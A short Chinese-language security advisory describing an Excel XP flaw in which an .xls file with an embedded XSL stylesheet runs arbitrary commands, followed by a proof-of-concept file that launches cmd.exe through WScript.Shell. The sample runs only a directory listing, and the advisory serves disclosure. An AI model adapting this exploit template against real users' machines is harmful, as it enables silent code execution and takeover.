|
Excel XP存在漏洞允许任意恶意代码执行
Excel XP包含了XML和XSLT的新技术。不幸的是,如果一个用户打开一个包含恶意代码的.xls文件,并且采用 xml style
sheet(允许XML的风格页面)模式查看,可以被动地执行任何指令。黑客可以利用这一点彻底控制用户的计算机。这时Excel不会警告用户,仅仅询问是不是使用xml风格。尽管默认情况下不使用"xml
style sheet"的。
解决方案:
不要使用xml stylesheet
攻击方法:
------xls_sux.xls-----
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="#?m$ux" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">
<xsl:script>
<![CDATA[
x=new ActiveXObject("WScript.Shell");
x.Run("%systemroot%\\SYSTEM32\\CMD.EXE /C DIR C:\\ /a /p /s");
]]>
</xsl:script>
<msux>
msux
written by georgi guninski
</msux>
</xsl:stylesheet>
----------------------
It contains both XML and a stylesheet in one file.
附加信息:
http://www.guninski.com
|